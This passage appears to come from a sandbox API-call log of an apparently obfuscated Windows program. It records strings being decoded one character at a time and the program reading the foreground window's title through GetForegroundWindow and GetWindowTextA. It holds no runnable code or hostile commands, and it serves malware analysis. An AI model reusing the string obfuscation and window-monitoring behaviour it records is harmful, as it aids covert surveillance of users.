lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0085.918] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0085.918] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0085.919] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0085.919] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0085.919] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0085.920] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0085.920] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0085.920] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0085.921] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0085.921] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0085.922] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0085.922] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0085.922] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0085.923] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0085.923] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0085.923] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0085.924] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0085.924] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.924] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="user32", cbMultiByte=6, lpWideCharStr=0x28e0c4, cchWideChar=2047 | out: lpWideCharStr="user32(\x1a") returned 6 [0085.924] SysReAllocStringLen (in: pbstr=0x28f0fc*=0x0, psz="user32", len=0x6 | out: pbstr=0x28f0fc*="user32") returned 1 [0085.924] CharLowerBuffW (in: lpsz="user32", cchLength=0x6 | out: lpsz="user32") returned 0x6 [0085.925] GetModuleHandleA (lpModuleName="user32") returned 0x75980000 [0085.925] GetProcAddress (hModule=0x75980000, lpProcName="GetForegroundWindow") returned 0x759a2320 [0085.926] GetForegroundWindow () returned 0x102c2 [0085.926] GetLastError () returned 0x0 [0085.926] SysStringLen (param_1=" ") returned 0xff [0085.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0085.926] SysStringLen (param_1=" ") returned 0xff [0085.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0085.926] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="user32", cbMultiByte=6, lpWideCharStr=0x28e0b8, cchWideChar=2047 | out: lpWideCharStr="user32user32(\x1a") returned 6 [0085.926] SysReAllocStringLen (in: pbstr=0x28f0f0*=0x0, psz="user32", len=0x6 | out: pbstr=0x28f0f0*="user32") returned 1 [0085.926] CharLowerBuffW (in: lpsz="user32", cchLength=0x6 | out: lpsz="user32") returned 0x6 [0085.927] GetModuleHandleA (lpModuleName="user32") returned 0x75980000 [0085.927] GetProcAddress (hModule=0x75980000, lpProcName="GetWindowTextA") returned 0x759a0029 [0085.927] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0085.927] GetLastError () returned 0x0 [0085.928] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0085.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0085.928] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0085.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0085.928] SysStringLen (param_1="Ac") returned 0x2 [0085.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Ac", cchWideChar=3, lpMultiByteStr=0xe57084, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ac", lpUsedDefaultChar=0x0) returned 3 [0085.928] SetWindowTextA (hWnd=0x2036e, lpString="Ac") returned 1 [0085.928] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0085.928] GetFocus () returned 0x0 [0085.928] lstrlenA (lpString="Ac") returned 2 [0085.928] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe57084) returned 0x1 [0085.929] IsWindow (hWnd=0x2036e) returned 1 [0085.929] IsWindow (hWnd=0x2036e) returned 1 [0085.929] IsWindow (hWnd=0x2036e) returned 1 [0085.929] IsWindow (hWnd=0x2036e) returned 1 [0085.930] GetFocus () returned 0x0 [0085.930] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0085.930] GetFocus () returned 0x0 [0085.930] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x3) returned 0x310bcd0 [0085.930] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x3, lParam=0x310bcd0) returned 0x2 [0085.930] GetFocus () returned 0x0 [0085.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0085.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0xe57084, cchWideChar=3 | out: lpWideCharStr="Ac") returned 3 [0085.931] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0085.931] VarBstrCmp (bstrLeft="Ac", bstrRight="S ", lcid=0x0, dwFlags=0x30001) returned 0x0 [0086.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0086.026] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0086.027] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0086.028] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0086.028] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.029] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.030] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.031] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.031] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.033] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.033] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.034] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.035] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.036] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.036] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.037] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.038] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a", lpUsedDefaultChar=0x0) returned 1 [0086.038] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0086.039] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n", lpUsedDefaultChar=0x0) returned 1 [0086.040] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0086.040] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.041] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.041] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x", lpUsedDefaultChar=0x0) returned 1 [0086.042] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0086.042] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.043] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.044] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z", lpUsedDefaultChar=0x0) returned 1 [0086.045] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0086.045] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n", lpUsedDefaultChar=0x0) returned 1 [0086.046] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0086.046] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.046] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.047] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n", lpUsedDefaultChar=0x0) returned 1 [0086.047] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0086.048] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t", lpUsedDefaultChar=0x0) returned 1 [0086.048] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0086.048] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0086.049] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0086.049] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0086.050] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0086.051] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.052] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.052] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.052] VarSub (in: pvarLeft=0x28f1d8, 